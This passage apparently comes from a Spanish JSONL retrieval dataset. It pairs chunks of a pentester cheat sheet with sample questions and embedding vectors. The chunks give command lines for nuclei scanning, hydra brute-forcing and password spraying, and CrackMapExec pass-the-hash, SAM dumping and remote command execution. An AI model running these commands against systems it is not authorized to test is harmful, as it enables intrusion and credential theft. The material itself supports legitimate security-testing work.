0.03239, -0.0454, 0.03845, -0.05125, -0.04773, -0.05051, -0.04408, -0.02113, 0.01212, -0.01319, -0.00232, -0.0156, -0.00252, -0.04633, 0.03451, -0.07272, 0.00173, -0.01882, -0.00034, 0.08964, -0.04232, -0.05121, 0.04281, -0.0267, -0.06595, 0.01483, 0.04269, -0.0698, -0.05005, -0.00547, -0.07053, -0.05341, 0.06936, 0.05124, -0.01144, -0.05118, 0.00781, -0.02685, 0.0004, 0.03466, 0.03901, -0.0123, -0.00323, -0.03737, -0.00632, 0.01882, 0.00751, -0.01092, 0.006, 0.04828, 0.11489, -0.0618, -0.06422, 0.00194, 0.06123, 0.02424, 0.03036, 0.00777, 0.02334, -0.0294, -0.01384, -0.01326, 0.04498, -0.00925, 0.01116, -0.04543, -0.02059, -0.08822, 0.03364, 0.08709, 0.0167, -0.06335, -0.05003, -0.03979, -0.02815, -0.02331, 0.0436, -0.07813, -0.00446, 0.00105, 0.04256, -0.03098, 0.00735, -0.04486]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Escaneo de vulnerabilidades (nuclei)\n\n```bash\nnuclei -u http://IP\nnuclei -l objetivos.txt -severity critical,high\nnuclei -u http://IP -t cves/ -t exposures/\nnuclei -u http://IP -tags sqli,xss,lfi\n```", "indexar": "que herramienta sirve para escanear vulnerabilidades en una red de forma rΓ‘pida?", "v": [0.05521, -0.02868, -0.21819, -0.15453, 0.05163, -0.08236, -0.14147, -0.11359, 0.1167, -0.02788, -0.08146, -0.16197, -0.02934, -0.1348, 0.10797, 0.11744, -0.0291, -0.0986, 0.04426, 0.07617, -0.00861, -0.05021, -0.08177, -0.00396, -0.07337, 0.06985, 0.02798, 0.00815, -0.15999, 0.05965, -0.01137, 0.06725, 0.03156, -0.01313, -0.14475, 0.03923, 0.01575, -0.00625, -0.00893, 0.10101, -0.01359, 0.02764, -0.0806, -0.02011, 0.02891, 0.00857, -0.1047, 0.03698, 0.00575, 0.14872, -0.06224, -0.14358, -0.20287, -0.04419, -0.05781, -0.14353, 0.15915, -0.12195, -0.02892, -0.05387, -0.08373, 0.03693, -0.0011, -0.03379, 0.00068, -0.01068, -0.04306, -0.02794, -0.11089, 0.06701, -0.01863, 0.02088, -0.01222, -0.00018, -0.04172, -0.02397, -0.05647, 0.05975, 0.03112, 0.01814, 0.07504, 0.04561, -0.07172, 0.00768, -0.10835, -0.07748, 0.12969, -0.0381, 0.04385, -0.05841, 0.05711, 0.06229, 0.03567, 0.01363, 0.03377, -0.05076, 0.0835, -0.01217, -0.02837, -0.05359, 0.03796, -0.07111, -0.10702, 0.05197, 0.01155, 0.07038, -0.04778, 0.00752, -0.01974, -0.00883, 0.03727, 0.01452, 0.02385, -0.01044, -0.0117, 0.04387, 0.00678, -0.01389, 0.0082, -0.02573, 0.0281, -0.07082, -0.08685, -0.03974, -0.01502, -0.02442, -0.06052, -0.00753, 0.00533, -0.05707, -0.02839, -0.07028, -0.07897, 0.01949, -0.02283, -0.01555, 0.00594, -0.15838, -0.00085, -0.07786, 0.05385, 0.02627, -0.05826, -0.11086, -0.02908, 0.08943, 0.10602, -0.07014, -0.0244, 0.02354, 0.02361, -0.03117, -0.07931, 0.00098, -0.06671, 0.00968, -0.02478, 0.02397, -0.10626, 0.0997, -0.02746, -0.01565, 0.06637, 0.04985, -0.03211, -0.08343, 0.09062, 0.01837, 0.09641, 0.03929, 0.03079, 0.06156, 0.03069, -0.04223, 0.0084, -0.07178, -0.04867, -0.04575, -0.00075, -0.11635, 0.02075, -0.0371, -0.04209, -0.00756, 0.02384, -0.05778, 0.0334, -0.02437, 0.01978, 0.0254, -0.00586, -0.02467, 0.03329, -0.02725, 0.01959, 0.02888, -0.01687, -0.02599, 0.01225, -0.06697, -0.08829, -0.03382, -0.04076, -0.02813, 0.04705, 0.08087, 0.00254, -0.03088, 0.00097, 0.08815, -0.00347, 0.03133, 0.07581, -0.02683, 0.00193, -0.07071, 0.05211, 0.04352, -0.00219, -0.06301, 0.03757, -0.04647, 0.02554, 0.04586, -0.013, 0.02364, -0.01777, -0.05999, -0.01131, -0.00633, 0.0831, -0.05856, -0.04232, -0.04565, 0.02113, -0.09085, 0.06351, 0.00506, -0.04477, -0.02302, 0.02579, 0.01419, -0.02367, -0.01387, -0.00758, -0.05394, -0.01664, -0.02555, -0.01261, -0.08187, -0.05497, 0.02923, 0.04743, -0.09028, 0.02117, -0.05441]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Escaneo de vulnerabilidades (nuclei)\n\n```bash\nnuclei -u http://IP\nnuclei -l objetivos.txt -severity critical,high\nnuclei -u http://IP -t cves/ -t exposures/\nnuclei -u http://IP -tags sqli,xss,lfi\n```", "indexar": "cΓ³mo puedo generar un reporte de vulnerabilidades crΓ­tico sin pagar licencias?", "v": [0.1302, 0.07281, -0.11011, -0.10826, 0.07308, -0.12546, 0.00767, 0.0094, -0.13872, -0.12873, 0.11214, -0.19054, 0.00142, -0.0392, 0.09446, 0.07537, -0.02542, -0.06424, 0.06487, -0.03244, 0.01677, -0.08982, 0.06125, -0.08643, -0.0337, -0.01926, 0.06212, -0.12638, -0.06731, 0.02869, -0.05228, 0.02453, 0.13606, 0.00872, -0.02554, 0.12234, 0.01994, 0.08016, 0.11328, 0.06897, 0.13499, 0.01048, -0.04262, -0.01287, 0.04313, -0.20576, -0.04336, 0.02846, 0.02128, 0.032, -0.01976, -0.01361, -0.17011, -0.07303, 0.07169, -0.00594, 0.08943, -0.06269, 0.09114, -0.0193, -0.04254, 0.12116, 0.13037, -0.05182, -0.01866, 0.04149, 0.07204, 0.03563, -0.03, 0.07984, -0.02606, -0.014, 0.00417, 0.0198, -0.03911, 0.01713, -0.09299, -0.04884, -0.04928, 0.05567, 0.09632, -0.00762, 0.00563, -0.01172, -0.11232, -0.03973, 0.02427, -0.05785, 0.04727, 0.00971, 0.09516, 0.06605, -0.02999, 0.05588, 0.03082, -0.07596, 0.09, -0.03346, -0.06074, -0.00091, -0.10099, -0.02856, 0.05715, 0.01024, 0.0447, 0.10408, 0.11132, -0.07032, -0.01876, -0.02607, -0.02601, 0.08899, -0.07894, -0.01331, -0.00979, 0.00494, -0.0528, -0.03819, 0.05046, 0.06438, 0.05929, -0.01078, -0.00251, -0.07362, 0.0096, 0.04, 0.01727, 0.10271, 0.00831, -0.03471, -0.01594, 0.04026, 0.05178, 0.06044, 0.03702, 0.05929, 0.01953, -0.02257, -0.13656, -0.00824, 0.07011, 0.08822, 0.11791, 0.06456, 0.00615, 0.08178, -0.08166, -0.08778, -0.15439, -0.02678, 0.01646, -0.00474, -0.1117, 0.02634, -0.06972, 0.02301, -0.05858, -0.07972, 0.01662, 0.04765, 0.05739, 0.06894, -0.02543, -0.02187, 0.00985, 0.04569, 0.03301, 0.02076, 0.08847, -0.01422, -0.00278, -0.00099, 0.02997, -0.02325, 0.10852, -0.09926, -0.02658, -0.07189, -0.03965, -0.05379, -0.0432, -0.03329, -0.09191, -0.04464, -0.02709, 0.07238, 0.04044, 0.02999, 0.0891, 0.08115, -0.04191, 0.00723, 0.03551, -0.03339, 0.05595, -0.04909, -0.02485, -0.00319, -0.00962, -0.03066, -0.04269, 0.0087, -0.04837, 0.00459, 0.07562, -0.02786, -0.04469, 0.04415, -0.00044, 0.04003, -0.0058, -0.0613, 0.02182, -0.07447, -0.0759, 0.03499, -0.0119, -0.02394, -0.07554, -0.01349, 0.07886, -0.04188, 0.02732, -0.00522, 0.05633, -0.01692, -0.02053, -0.01067, 0.05484, 0.0241, -0.04277, 0.03016, -0.09524, -0.06315, 0.06467, 0.0038, 0.00548, 0.00558, 0.01301, 0.02791, 0.04953, 0.03812, -0.00058, -0.04767, -0.04005, -0.02617, -0.05288, -0.01079, 0.01251, -0.04939, 0.01773, 0.08785, 0.07149, -0.00212, 0.04016, -0.05337]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Escaneo de vulnerabilidades (nuclei)\n\n```bash\nnuclei -u http://IP\nnuclei -l objetivos.txt -severity critical,high\nnuclei -u http://IP -t cves/ -t exposures/\nnuclei -u http://IP -tags sqli,xss,lfi\n```", "indexar": "cual programa me permite probar si mi servidor tiene fallos como SQLi o XSS?", "v": [-0.05021, -0.0673, -0.12282, -0.03703, -0.09785, -0.26238, -0.01349, -0.24544, 0.00235, 0.02639, -0.12928, -0.00611, 0.07234, -0.11573, -0.01493, 0.03769, 0.10477, -0.11927, -0.02199, 0.11398, 0.07266, -0.07405, -0.07927, -0.15203, -0.03198, 0.01154, 0.07083, -0.01574, -0.02474, -0.11361, -0.0006, -0.09992, 0.02529, -0.07313, 0.03628, -0.02817, -0.10511, 0.12923, -0.00526, 0.01778, 0.08784, -0.04731, -0.11965, 0.00402, 0.09059, -0.08202, 0.02053, -0.016, -0.01929, -0.04499, 0.00162, -0.04082, -0.11745, 0.01193, -0.0053, -0.0758, 0.05983, -0.10074, 0.03843, 0.05282, -0.06787, -0.04555, 0.06518, -0.06286, -0.01345, -0.09383, 0.049, -0.01066, -0.0525, 0.02887, -0.08202, 0.01398, -0.03486, -0.08744, 0.02361, -0.00674, 0.07585, -0.02759, 0.11528, 0.0072, -0.0808, -0.01435, -0.08209, 0.16523, -0.04017, -0.03919, -0.01426, -0.03146, -0.02409, -0.00355, 0.05453, 0.0314, 0.03463, 0.06179, 0.05251, -0.08749, 0.19356, 0.00638, 0.00742, 0.01307, 0.09742, 0.01498, -0.09399, 0.11829, -0.06638, 0.10111, 0.10491, 0.00914, -0.0069, -0.01429, 0.06947, -0.06375, -0.05083, -0.01235, -0.04919, -0.02621, 0.00498, -0.00358, -0.03408, 0.03998, -0.0585, 0.02049, 0.00877, 0.0361, 0.03958, -0.08251, 0.06326, 0.04075, -0.0079, 0.02622, 0.05402, -0.0092, -0.01759, -0.03257, -0.07058, -0.00976, 0.07371, -0.01179, -0.0765, -0.09127, -0.01176, 0.01585, 0.03079, 0.02554, 0.05058, 0.03042, 0.00703, 0.00414, -0.07157, -0.00652, -0.02244, -0.03457, 0.00075, 0.03755, -0.13527, -0.06015, 0.01455, -0.01013, -0.03162, 0.07334, -0.02953, 0.00138, 0.04968, 0.04789, 0.0571, -0.02837, 0.02542, 0.00127, 0.08469, 0.0621, -0.05333, 0.07309, -0.01225, -0.11188, -0.01785, -0.02159, -0.0788, -0.10694, 0.07226, -0.00044, -0.05436, 0.06937, 0.0239, 0.03025, -0.04821, -0.07493, -0.03434, 0.05246, 0.04312, -0.05999, -0.01357, 0.01962, -0.01508, -0.04987, 0.05767, -0.06521, -0.01368, -0.0722, 0.00456, -0.07443, -0.07136, -0.03796, -0.03395, -0.08005, 0.00925, 0.01515, -0.05554, 0.02767, -0.00407, 0.04166, 0.01179, -0.02964, 0.11467, -0.00566, -0.04907, -0.03949, 0.04293, -0.00713, 0.00652, -0.0194, -0.06033, -0.02051, 0.06383, 0.01777, -0.01053, -0.02855, 0.03027, -0.0118, 0.03642, 0.00326, -0.0113, -0.03005, -0.0661, -0.0276, 0.0864, 0.02764, -0.0074, -0.06459, -0.00707, -0.11504, 0.05889, 0.136, -0.01022, -0.07718, 0.01784, -0.027, -0.05738, 0.0222, -0.02767, -0.01204, 0.00303, 0.01966, 0.02288, -0.05313, 0.01862, 0.01686]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Fuerza bruta de credenciales (hydra)\n\n```bash\nhydra -l USER -P WL ssh://IP\nhydra -L users.txt -P WL IP ssh -t 4\nhydra -l USER -P WL IP http-post-form \"/login:user=^USER^&pass=^PASS^:F=incorrect\"\nhydra -l USER -P WL ftp://IP\nhydra -L users.txt -p PASS smb://IP # spraying\n```", "indexar": "que programa sirve para probar contraseΓ±as automΓ‘ticamente en varios servicios?", "v": [0.16233, 0.11635, -0.20324, -0.20049, 0.02202, -0.13182, 0.06486, -0.14796, -0.13908, -0.13116, -0.05033, -0.03377, 0.04771, -0.14716, -0.02834, 0.00541, 0.12068, -0.12969, 0.10378, 0.14664, 0.04753, -0.05447, -0.08956, -0.05403, -0.0558, -0.02437, 0.07568, -0.05551, -0.09976, 0.02626, 0.00632, -0.04023, 0.11068, -0.07571, -0.06049, 0.05056, 0.04055, 0.08974, 0.07072, 0.0727, 0.12415, -0.00946, -0.05986, 0.07219, 0.01565, 0.05409, 0.05269, 0.02293, 0.03647, -0.04267, -0.02783, -0.05798, -0.03855, -0.06622, -0.01023, -0.0779, 0.01595, -0.08688, -0.09888, 0.01538, -0.05043, 0.0054, 0.05314, 0.05488, 0.0206, -0.06813, 0.08967, 0.00434, -0.08258, 0.07148, -0.04355, 0.03885, 0.01196, 0.01924, -0.06061, 0.00922, 0.00806, -0.02823, 0.04322, 0.04267, -0.08262, 0.00252, 0.00605, 0.02797, -0.14873, -0.02789, 1e-05, -0.03029, 0.07179, -0.05206, 0.08548, 0.03965, 0.04779, 0.13527, 0.0555, -0.02363, 0.15783, -0.00161, 0.02232, -0.0252, 0.0812, -0.035, -0.04269, 0.16643, -0.11808, 0.03701, 0.04455, -0.0013, -0.03555, -0.0248, 0.01136, -0.02159, -0.08565, -0.07276, -0.06704, -0.04768, -0.02789, -0.06096, 0.06545, 0.02327, -0.08148, -0.03705, 0.00429, 0.06568, 0.07429, 0.02968, -0.00222, 0.02928, -0.02641, 0.02741, 0.05193, -0.00789, -0.06181, 0.0149, -0.03472, -0.00671, 0.03083, -0.06646, -0.0673, -0.03063, 0.04056, 0.0727, 0.05044, -0.00081, 0.07159, 0.01672, 0.03969, -0.06102, -0.00206, 0.06996, -0.04458, 0.00785, 0.01124, 0.08896, -0.10491, -0.04299, -0.02241, -0.10171, -0.06504, 0.14567, -0.02403, -0.02725, -0.01572, 0.0611, -0.00528, -0.01351, 0.01562, 0.00174, 0.09834, 0.07311, -0.02421, 0.09682, 0.02527, -0.09208, -0.04316, 0.04138, -0.00672, -0.11109, 0.06513, -0.05383, -0.06183, -0.00941, 0.00118, 0.00086, -0.0041, -0.06391, 0.02674, 0.00563, 0.0175, -0.01731, 0.00185, -0.02107, -0.08513, 0.02377, -0.00574, -0.02498, -0.05365, -0.04127, -0.02841, -0.1024, -0.04762, 0.02442, -0.03074, -0.02452, 0.0146, 0.06389, -0.00757, 0.00016, 0.0106, 0.07411, -0.00262, -0.00528, 0.085, -0.02131, -0.06498, -0.05291, 0.00955, 0.00124, 0.00564, 0.03405, -0.01722, -0.03418, 0.03411, 0.07679, 0.00481, -0.02747, 0.06734, 0.06091, 0.06881, 0.01186, -0.01112, 0.01644, -0.04017, -0.01037, 0.09121, -0.02506, -0.00758, -0.05541, -0.03068, -0.09758, -0.03717, 0.06095, -0.00838, -0.07634, -0.03132, -0.04018, -0.03379, 0.00234, 0.02844, -0.00478, -0.05979, 0.06199, 0.00149, -0.01672, 0.02855, -0.00358]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Fuerza bruta de credenciales (hydra)\n\n```bash\nhydra -l USER -P WL ssh://IP\nhydra -L users.txt -P WL IP ssh -t 4\nhydra -l USER -P WL IP http-post-form \"/login:user=^USER^&pass=^PASS^:F=incorrect\"\nhydra -l USER -P WL ftp://IP\nhydra -L users.txt -p PASS smb://IP # spraying\n```", "indexar": "con que puedo hacer un ataque de fuerza bruta contra servidores SSH?", "v": [-3e-05, -0.07515, -0.22313, -0.03746, -0.11811, 0.02009, 0.06409, -0.1191, 0.0485, 0.04407, -0.09259, 0.06862, 0.04475, -0.00229, 0.0108, -0.04009, 0.02799, -0.05901, -0.09091, 0.01692, 0.07402, -0.11016, 0.16673, -0.04267, -0.08916, 0.02464, -0.00237, 0.17135, -0.07393, -0.06165, -0.02563, 0.02175, 0.12886, -0.00826, 0.12245, 0.01738, -0.14205, 0.11997, 0.13764, 0.14527, -0.00821, 0.02905, -0.15618, -0.08156, 0.00032, 0.01305, -0.01139, 0.00823, 0.0133, 0.056, -0.09404, -0.01077, -0.15542, -0.08763, -0.15945, -0.06733, 0.00933, -0.10641, -0.10469, 0.04947, -0.13445, 0.10543, -0.04678, -0.06273, 0.0509, -0.01964, -0.03621, -0.04513, -0.03469, -0.04775, -0.14464, -0.01327, -0.08209, -0.07535, -0.06316, 0.07362, -0.02082, 0.06547, -0.03369, 0.02445, -0.10519, 0.03895, -0.1365, 0.02773, -0.11794, -0.06996, 0.01171, -0.09515, -0.05502, -0.03406, 0.01911, 0.04025, -0.02211, 0.0194, -0.05675, 0.01668, 0.01612, -0.08436, 0.00695, -0.04885, -0.00707, -0.06056, -0.02197, -0.02496, 0.10645, -0.00694, -0.02425, -0.01757, 0.06107, 0.00514, 0.00375, -0.12443, -0.0775, 0.03936, -0.02362, -0.06269, -0.12686, -0.05857, -0.01257, 0.10338, -0.09048, -0.02257, -0.00646, 0.08253, -0.0339, 0.01725, 0.07155, -0.02463, -0.0363, -0.08604, 0.03318, 0.0113, 0.06281, -0.01971, -0.00057, -0.00418, 0.06803, -0.09831, -0.01617, -0.04785, 0.01494, 0.05429, 0.03884, -0.01418, 0.01165, -0.00797, 0.01747, -0.05356, -0.11742, 0.01511, 0.07525, -0.04916, 0.01393, 0.07029, -0.06474, -0.00688, 0.06282, -0.07979, -0.07054, 0.07307, -0.03251, 0.01233, -0.09896, 0.08931, 0.02517, 0.02209, -0.08039, -0.02647, 0.03417, 0.00661, -0.02791, -0.02853, 0.05013, 0.00193, 0.01183, -0.08097, -0.07312, 0.05264, 0.04573, 0.03672, 0.02511, 0.01031, -0.07189, 0.02104, -0.05639, 0.00347, 0.03608, 0.0228, 0.03379, -0.01203, -0.00583, 0.06192, -0.02278, 0.07253, 0.01165, -0.05403, -0.03857, 0.07144, -0.01548, 0.00088, 0.00888, -0.06114, -0.05859, -0.01657, 0.04264, 0.03707, -0.03039, 0.01187, -0.0123, 0.01929, 0.01128, 0.00552, 0.10498, -0.0858, -0.07317, -0.00884, 0.03089, -0.02811, 0.03086, -0.0086, -0.01167, 0.05718, 0.00326, 0.02911, -0.01766, -0.00807, 0.00124, -0.08446, 0.05058, 0.03437, -0.02909, -0.05463, 0.05016, -0.01754, -0.04735, -0.01465, 0.023, 0.00245, -0.08702, 0.02242, -0.01155, 0.03336, -0.01882, -0.05001, -0.03975, -0.0694, -0.03421, -0.02619, -0.04091, -0.00872, 0.02924, 0.03401, 0.05702, 0.01326, 0.01128, -0.01629]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "## Fuerza bruta de credenciales (hydra)\n\n```bash\nhydra -l USER -P WL ssh://IP\nhydra -L users.txt -P WL IP ssh -t 4\nhydra -l USER -P WL IP http-post-form \"/login:user=^USER^&pass=^PASS^:F=incorrect\"\nhydra -l USER -P WL ftp://IP\nhydra -L users.txt -p PASS smb://IP # spraying\n```", "indexar": "cual es una alternativa a herramientas como Hydra para intentar login con muchas combinaciones?", "v": [-0.00583, 0.11525, -0.20495, -0.07699, -0.06517, -0.0076, -0.1189, 0.0969, -0.10273, -0.05111, -0.078, -0.09877, 0.02769, 0.058, 0.10478, -0.03097, 0.06754, -0.10104, -0.03075, -0.02915, -0.05529, 0.09391, -0.13732, -0.04337, -0.10642, -0.16129, -0.04554, 0.10391, -0.25463, -0.06495, -0.04292, 0.08901, 0.06365, 0.04299, -0.15086, 0.01044, -0.02212, 0.13958, 0.08058, -0.05941, -0.04572, 0.01893, 0.00595, 0.01539, 0.01205, 0.03703, -0.08184, 0.0065, -0.04034, 0.02606, -0.06637, 0.01571, -0.0969, -0.0211, 0.11259, -0.15693, 0.17269, -0.06641, -0.0924, -0.07105, -0.02879, 0.02066, 0.00214, 0.09956, -0.02097, 0.06026, -0.11294, -0.10965, -0.07466, 0.13637, -0.00091, -0.03051, -0.05291, -0.07039, -0.06455, 0.03257, 0.09932, 0.03992, 0.04457, 0.02126, 0.07416, -0.0601, -0.03732, 0.01876, -0.07867, -0.13958, 0.09349, -0.07377, 0.07747, -0.09596, 0.03694, -0.05637, 0.03454, 0.10118, 0.00099, -0.08919, 0.05651, -0.01429, -0.03195, -0.0143, 0.07057, 0.04112, -0.05675, 0.0507, -0.06301, -0.00033, -0.01279, 0.01131, -0.07784, 0.0188, 0.00281, 0.09099, 0.00419, -0.00919, 0.04828, -0.01792, -0.05034, -0.07407, -0.0064, -0.03106, -0.00268, -0.01818, -0.08943, -0.03283, 0.02865, 0.04955, 0.04357, -0.04925, 0.0163, 0.0454, 0.00202, 0.06448, -0.07616, -0.05305, 0.01169, -0.01896, 0.05694, -0.05996, -0.03891, -0.03825, 0.0122, 0.09152, 0.01638, -0.1377, 0.02711, 0.01306, 0.0467, 0.00253, 0.00042, -0.01773, -0.01329, -0.06464, 0.01503, 0.1179, -0.05538, 0.02846, -0.03795, 0.0012, -0.04781, 0.02396, 0.02153, -0.07755, 0.04664, 0.00128, -0.08439, -0.03212, -0.03355, -0.0877, -0.0406, -0.03041, 0.07362, 0.07349, 0.03233, -0.02367, 0.0043, -0.04004, -0.01982, -0.0392, 0.00215, -0.00956, -0.03544, -0.00721, -0.07839, -0.02216, 0.06569, -0.09371, -0.01783, 0.00264, 0.0297, 0.05067, 0.0084, 0.02082, -0.08093, -0.09077, 0.00023, -0.01772, 0.03864, -0.05204, 0.01802, -0.00922, 0.00165, 0.00227, -0.02506, -0.09042, 0.02813, 0.04284, -0.07594, -0.03292, 0.01663, -0.00208, 0.06857, -0.03861, 0.03588, -0.044, -0.04611, -0.05143, -0.04849, -0.00563, -0.02457, 0.00258, 0.00209, 0.00301, -0.01943, 0.018, -0.06879, 0.03651, 0.02783, 0.03223, -0.04814, 0.01118, 0.03007, -0.04464, -0.00332, 0.01967, -0.0041, 0.02463, 0.04467, 0.03418, -0.043, -0.04023, 0.0673, 0.04751, -0.00849, 0.00711, -0.08396, -0.01559, -0.05382, -0.02196, -0.05167, -0.0264, 0.044, 0.05506, 0.01381, -0.01457, 0.10515, -0.04527]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# CrackMapExec / NetExec β€” el navaja suiza de AD\ncrackmapexec smb IP -u USER -p PASS --shares\ncrackmapexec smb 10.0.0.0/24 -u USER -p PASS # barrido/spray\ncrackmapexec smb IP -u USER -H HASH --sam # pass-the-hash + dump SAM\ncrackmapexec winrm IP -u USER -p PASS -x \"whoami\"\nnetexec smb IP -u USER -p PASS --users --groups", "indexar": "que programa sirve para hacer un barrido de credenciales en una red local?", "v": [-0.10025, 0.00984, -0.16295, -0.08765, 0.02124, -0.06183, 0.09838, -0.06943, -0.00245, -0.22583, -0.08718, -0.04787, -0.01834, -0.17199, 0.06962, 0.07634, -0.03978, 0.04704, 0.14069, 0.01514, -0.00328, -0.02397, -0.01425, 0.121, 0.09634, -0.0056, 0.00446, -0.10184, -0.05774, 0.17787, 0.03187, 0.02663, -0.02721, -0.05977, -0.05928, 0.00681, 0.01549, 0.03071, -0.1287, 0.03733, -0.05069, -0.07257, -0.02663, -0.0004, 0.05182, 0.05451, 0.06, -0.02175, -0.01847, 0.02666, -0.03404, -0.14598, -0.0353, -0.06549, 0.04479, -0.07079, -0.05077, -0.10219, -0.11512, -0.05779, -0.00924, -0.12506, 0.05439, 0.00853, 0.06974, -0.03615, 0.04154, 0.06278, 0.04016, 0.06012, -0.09565, -0.04339, 0.02367, -0.00826, -0.05709, 0.02323, -0.03269, -0.05849, 0.05837, -0.08435, 0.04096, 0.03287, 0.07238, 0.04473, 0.01227, -0.036, 0.011, -0.09768, -0.02982, 0.01877, 0.06063, 0.08864, 0.08473, 0.05603, 0.03495, -0.00859, 0.1082, 0.07769, 0.00978, 0.03315, 0.03995, -0.14508, -0.11762, 0.02399, 0.09759, 0.08872, 0.01771, 0.04333, 0.03741, 0.02191, 0.07018, -0.02291, -0.04819, 0.01399, -0.10795, 0.01398, 0.02113, 0.02523, -0.0002, -0.00137, -0.05591, -0.07343, -0.07637, -0.06541, -0.03359, -0.01217, -0.10003, 0.03399, -0.06667, 0.09345, -0.04993, 0.01703, -0.00709, -0.07195, -0.08611, -0.11485, 0.06262, -0.07647, -0.05003, 0.00769, 0.05839, 0.02998, 0.00471, -0.03062, -0.04462, 0.05448, -3e-05, -0.08769, 0.04582, 0.03082, 0.00242, 0.07502, -0.05726, 0.00784, -0.08595, -0.005, 0.14494, -0.07723, -0.02925, 0.09069, -0.02105, -0.06283, 0.0311, -0.00419, -0.01085, -0.07611, 0.00142, 0.021, 0.09153, 0.06035, -0.07292, 0.08819, -0.04504, -0.05353, -0.00462, -0.03949, 0.03272, -0.12744, -0.00341, -0.03455, -0.04688, 0.06907, 0.03368, 0.07843, -0.00474, -0.05131, -0.05279, -0.02546, 0.00431, -0.05394, -0.02038, -0.07234, 0.01586, 0.02806, -0.01059, 0.02484, 0.00476, -0.02195, -0.0355, -0.00477, -0.10435, 0.00527, -0.01305, 0.03971, 0.04667, 0.11065, 0.00974, 0.04223, 0.02014, 0.17267, -0.0127, -0.00185, 0.03294, 0.01715, -0.07891, -0.04389, 0.02149, 0.01192, 0.03828, -0.0212, 0.06994, -0.04141, -0.02492, 0.10884, 0.00036, -0.08704, 0.05325, -0.02958, 0.03618, 0.07731, -0.01867, -0.02572, -0.00628, -0.01798, 0.02755, -0.01934, 0.03585, 0.03711, -0.00936, -0.15023, -0.01804, 0.02248, -0.04395, -0.0354, -0.01494, -0.0093, -0.07145, 0.00126, 0.06335, -0.00823, -0.00721, 0.05959, 0.06258, 0.00648, 0.05217, 0.07081]} +{"tipo": "pregunta", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "tema": "cheatsheets", "fuente": null, "licencia": null, "texto": "# CrackMapExec / NetExec β€” el navaja suiza de AD\ncrackmapexec smb IP -u USER -p PASS --shares\ncrackmapexec smb 10.0.0.0/24 -u USER -p PASS # barrido/spray\ncrackmapexec smb IP -u USER -H HASH --sam # pass-the-hash + dump SAM\ncrackmapexec winrm IP -u USER -p PASS -x \"whoami\"\nnetexec smb IP -u USER -p PASS --users --groups", "indexar": "cual es una herramienta que pueda usar para saltar cuentas con hashes (pass-the-hash)?", "v": [0.08061, -0.00701, -0.16439, -0.07682, -0.02049, -0.20581, -0.05289, -0.10406, -0.02977, 0.08344, -0.18294, -0.03466, -0.09468, 0.06164, 0.01391, 0.05668, 0.04897, 0.04038, -0.0715, 0.01689, -0.01836, -0.01859, -0.17806, -0.01796, -0.17721, -0.04135, 0.02176, 0.04946, -0.34422, 0.02362, -0.01846, 0.00287, -0.05503, -0.02443, -0.03245, -0.00236, -0.06847, 0.09778, 0.06335, 0.09481, -0.01027, 0.13174, -0.07735, 0.05656, 0.02932, -0.1186, -0.04635, 0.10445, 0.03787, 0.04309, 0.08672, -0.06144, -0.23391, 0.06472, -0.04021, -0.1527, 0.13309, 0.00204, -0.12289, -0.08598, -0.10705, 0.02069, 0.0009, 0.01874, -0.08473, -0.05822, 0.0404, -0.02921, -0.10442, 0.07962, 0.00236, 0.10359, -0.01313, 0.0944, -0.01072, -0.00792, 0.02993, -0.06232, 0.03478, 0.03483, -0.00246, -0.11859, 0.03553, 0.02105, -0.0768, -0.09512, 0.03862, -0.04831, 0.11436, 0.02444, -0.00604, -0.00152, 0.00991, -0.0133, -0.02172, -0.00475, 0.0437, -0.02229, -0.0557, -0.05567, 0.02436, 0.0201, -0.12912, 0.12069, -0.04459, 0.03472, 0.03085, -0.03272, 0.00203, -0.00808, 0.09442, -0.01427, -0.06132, -0.05623, -0.0265, 0.06769, -0.06918, -0.01388, -0.0133, -0.00181, 0.03514, -0.01249, 0.02888, -0.02875, 0.06479, -0.04048, -0.02933, 0.0734, -0.02796, -0.01985, 0.00188, -0.01889, -0.08134, 0.01176, 0.00351, 0.02037, 0.01617, -0.08173, -0.00172, -0.03113, 0.00079, 0.05409, -0.03793, -0.1149, 0.06568, 0.03469, -0.00012, -0.01629, -0.07687, 0.00689, 0.07872, -0.06105, -0.01451, 0.04119, -0.03689, -0.0162, 0.02036, -0.01053, -0.13982, 0.06866, -0.0826, -0.02246, 0.01718, 0.03909, 0.01415, -0.06696, 0.02695, -0.00883, 0.04006, -0.00398, 0.03966, -0.00033, 0.04126, 0.00355, 0.04588, -0.09868, -0.06394, -0.01605, -0.04204, -0.07837, -0.01298, -0.03613, 0.01662, -0.05258, 0.0061, -0.0717, 0.0366, 0.00547, 0.02868, 0.03678, -0.00544, 0.05374, -0.0349, -0.01558, -0.0074, 0.03345, 0.0205, -0.03434, 0.05738, -0.0472, 0.00351, 0.05922, -0.05151, -0.02492, 0.06211, 0.05029, -0.06101, 0.00605, -0.0138, 0.00518, 0.04533, -0.02993, 0.0303, -0.01819, -0.02308, 0.00821, -0.00615, -0.01249, -0.03293, 0.01429, 